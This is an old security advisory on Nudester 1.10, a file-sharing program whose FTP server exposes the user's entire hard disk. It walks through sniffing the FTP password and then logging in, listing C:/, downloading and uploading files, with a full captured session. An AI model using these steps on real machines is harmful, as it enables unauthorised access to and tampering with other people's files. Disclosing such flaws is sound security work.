COMMAND
Nudester
SYSTEMS AFFECTED
Nudester 1.10
PROBLEM
Following is based on a Real Security Advisory #1 by Cyph3r.
Nudester, a file sharing program for porn uses the FTP protocol
to transfer files. The problem is it gives access to the whole
hard disk instead of just the folder containing porn.
For example, open Nudester, and a sniffer program (like Iris) and
download a file from a user on Nudester. While having the sniffer
running filtering port 21 inclusive so you can get the password.
<Sniffed Data>
220 ICS FTP Server ready
user NUDESTER
331 Password required for NUDESTER
pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in
</Sniffed data>
Open an ftp client and connect to the ip
ftp> open ***.***.***.***
Connected to ***.***.***.***
220 ICS FTP Server ready.
User (***.***.***.***:(none)): NUDESTER
331 Password required for NUDESTER.
Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in.
- Bingo!
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> DIR
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
-rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
-rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
-rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
-rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
-rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
-rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
-rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
-rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
-rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
-rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
-rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
-rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
-rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
-rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
-rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
-rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
-rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
-rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
-rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
-rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
-rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
-rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
-rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
-rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
-rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
-rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
-rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
-rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
-rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
-rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
226 File sent ok
ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.
Lets see if we have access to download a file:
ftp> get netsig.txt
200 Port command successful.
150 Opening data connection for netsig.txt.
226 File sent ok
ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.
Yep, let's try to upload a file
ftp> put c:\temp.txt
200 Port command successful.
150 Opening data connection for TEMP.TXT.
226 File received ok
Anyone can gain full access to Nudester user's files; the
username is the same for every user. However the password is not
the same, you will have to sniff while downloading a file to
retrieve the password.
SOLUTION
The only solution to this problem is not to use Nudester.
Credits
-- UnKnown --
|